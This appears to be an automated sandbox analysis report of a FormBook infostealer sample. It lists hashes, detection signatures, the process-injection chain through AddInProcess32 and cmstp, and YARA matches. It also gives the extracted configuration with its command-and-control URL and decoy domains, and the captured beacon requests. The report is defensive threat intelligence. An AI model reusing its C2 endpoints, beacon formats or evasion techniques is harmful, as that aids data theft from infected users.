Loading ...

Play interactive tourEdit tour

Windows Analysis Report 583475.exe

Overview

General Information

Sample Name:583475.exe
Analysis ID:510246
MD5:721356bfa1f8c23d40f6b2ff77b55db0
SHA1:c4d25b17c64716f2e7558bd302cd901bd63757d8
SHA256:e876c1db90717ff0819f4fc578adace61decdad64963836ebc9ae983dc87a5d6
Tags:exexloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 583475.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\583475.exe' MD5: 721356BFA1F8C23D40F6B2FF77B55DB0)
    • AddInProcess32.exe (PID: 5540 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autofmt.exe (PID: 4720 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
      • cmstp.exe (PID: 7120 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
        • cmd.exe (PID: 5216 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.eeeptou.xyz/uat8/"], "decoy": ["suddennnnnnnnnnnn47.xyz", "fggj99.com", "ojosnegroshacienda.com", "tinyhollywood.com", "marketersmeetup.com", "anushreehomemadeproducts.online", "appsdeals14.com", "ocean-breath-retreat.com", "subin-party.com", "offroad.wiki", "coryfairbanks.com", "algurgpaint.net", "k1snks.com", "florakitchens.com", "tollywoodbold.com", "kzkidz.com", "bequestporfze.xyz", "tiplovellc.com", "city-ad.com", "strombolidefilm.com", "789trangchu.xyz", "transfer-news.pro", "wtv864.com", "seospiders.xyz", "bargaingreat.com", "clarysvillemotel.online", "fbiicrc.com", "pf-hi.com", "perverseonline.com", "hugevari.com", "dilekcaglar.online", "authorakkingsley.com", "cloudlessinc.com", "newjourneypro.com", "vacuumcoolingsouthamerica.com", "oursalesguide.com", "shopsoulandstone.com", "circularsmartcity.com", "segwayw.com", "tackle.tools", "tech-franchisee.com", "ff4c2m3vc.xyz", "nlug.net", "artofadhd.zone", "xfqmwk.xyz", "ossname.xyz", "copost.net", "kokosiborsel.quest", "abbastanza.info", "eyehealthtnpasumo4.xyz", "mashburnblog.com", "looped.agency", "atlasgsllc.com", "nimbleiter.com", "nzaz2.xyz", "varundeshpande.com", "foodbevtech.com", "cassandrajasmine.net", "taxunite.com", "hannahhirsh.com", "stonebay.pizza", "xh-kd.com", "tealdazzleshop.com", "wkpnmqfb.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x7c38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x7fc2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x13cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x137c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x13dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x13f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x89da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12a3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9752:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x191c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.0.AddInProcess32.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.0.AddInProcess32.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.0.AddInProcess32.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        7.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', CommandLine: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 7120, ProcessCommandLine: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe', ProcessId: 5216

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.eeeptou.xyz/uat8/"], "decoy": ["suddennnnnnnnnnnn47.xyz", "fggj99.com", "ojosnegroshacienda.com", "tinyhollywood.com", "marketersmeetup.com", "anushreehomemadeproducts.online", "appsdeals14.com", "ocean-breath-retreat.com", "subin-party.com", "offroad.wiki", "coryfairbanks.com", "algurgpaint.net", "k1snks.com", "florakitchens.com", "tollywoodbold.com", "kzkidz.com", "bequestporfze.xyz", "tiplovellc.com", "city-ad.com", "strombolidefilm.com", "789trangchu.xyz", "transfer-news.pro", "wtv864.com", "seospiders.xyz", "bargaingreat.com", "clarysvillemotel.online", "fbiicrc.com", "pf-hi.com", "perverseonline.com", "hugevari.com", "dilekcaglar.online", "authorakkingsley.com", "cloudlessinc.com", "newjourneypro.com", "vacuumcoolingsouthamerica.com", "oursalesguide.com", "shopsoulandstone.com", "circularsmartcity.com", "segwayw.com", "tackle.tools", "tech-franchisee.com", "ff4c2m3vc.xyz", "nlug.net", "artofadhd.zone", "xfqmwk.xyz", "ossname.xyz", "copost.net", "kokosiborsel.quest", "abbastanza.info", "eyehealthtnpasumo4.xyz", "mashburnblog.com", "looped.agency", "atlasgsllc.com", "nimbleiter.com", "nzaz2.xyz", "varundeshpande.com", "foodbevtech.com", "cassandrajasmine.net", "taxunite.com", "hannahhirsh.com", "stonebay.pizza", "xh-kd.com", "tealdazzleshop.com", "wkpnmqfb.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: 583475.exeJoe Sandbox ML: detected
          Source: 7.0.AddInProcess32.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.AddInProcess32.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.AddInProcess32.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 583475.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49757 version: TLS 1.0
          Source: 583475.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cmstp.pdbGCTL source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdb source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, cmstp.exe, 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, 00000007.00000000.731556294.0000000000892000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_02ABFC70
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then jmp 067C8B79h0_2_067C82F0
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_067CCF8C
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then push dword ptr [ebp-24h]0_2_067CDD68
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_067CDD68
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_067CD564
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then xor edx, edx0_2_067CDCA0
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then xor edx, edx0_2_067CDC96
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then push dword ptr [ebp-24h]0_2_067CDD5C
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_067CDD5C
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then push dword ptr [ebp-20h]0_2_067CDA48
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_067CDA48
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then push dword ptr [ebp-20h]0_2_067CDA3D
          Source: C:\Users\user\Desktop\583475.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_067CDA3D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi7_2_0040C3FD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi17_2_02F9C3FD

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.appsdeals14.com
          Source: C:\Windows\explorer.exeDomain query: www.tinyhollywood.com
          Source: C:\Windows\explorer.exeNetwork Connect: 68.66.224.28 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Performs DNS queries to domains with low reputationShow sources
          Source: DNS query: www.eeeptou.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.eeeptou.xyz/uat8/
          Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1Host: www.tinyhollywood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1Host: www.appsdeals14.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.4:49757 version: TLS 1.0
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 14:30:57 GMTContent-Type: text/htmlContent-Length: 275ETag: "61774856-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 14:31:02 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
          Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1E
          Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/gE
          Source: 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
          Source: 583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobjE
          Source: 583475.exe, 00000000.00000003.658913034.0000000006D81000.00000004.00000001.sdmpString found in binary or memory: http://ns.d
          Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: 583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
          Source: unknownDNS traffic detected: queries for: www.google.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1Host: www.tinyhollywood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1Host: www.appsdeals14.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
